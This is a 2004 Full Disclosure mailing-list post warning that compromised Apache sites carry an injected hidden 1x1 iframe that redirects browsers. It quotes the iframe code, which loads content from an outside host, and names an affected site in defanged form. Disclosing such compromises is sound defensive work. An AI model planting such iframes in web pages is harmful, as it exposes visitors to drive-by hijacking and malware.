Full Disclosure mailing list archives

browser hijack by apache sites

From: Filbert <filbert () pandora be>
Date: Sun, 23 May 2004 15:19:30 +0200

Hi,

This is the second time this weekend that I've been warned of an apache site 
on a Linux server were a line of code was added to redirect browsers to  porn 
sites.
First was the site of a Belgian political party. Second came today, and as of 
writing this it's still there. The admin was informed so it can be gone soon.

hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http
IE users do NOT click.

the code added at the bottom is:

<iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1 
HEIGHT=1></iframe></body>

anyone seen this before? What vulnerability is exploited here? FP?

Thx,
Filb.

-- 
echo "+++ATH0filb@+++ATH0filb () linuxmail org" | sed 's/+++ATH0//g'


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

browser hijack by apache sites Filbert (May 23)
- <Possible follow-ups>
- Re: browser hijack by apache sites D B (May 23)
- Re:browser hijack by apache sites Ian Latter (May 23)
- browser hijack by apache sites Feher Tamas (May 24)
  - Re: browser hijack by apache sites Filbert (May 24)
  - Re: browser hijack by apache sites Matthijs Dalhuijsen (May 25)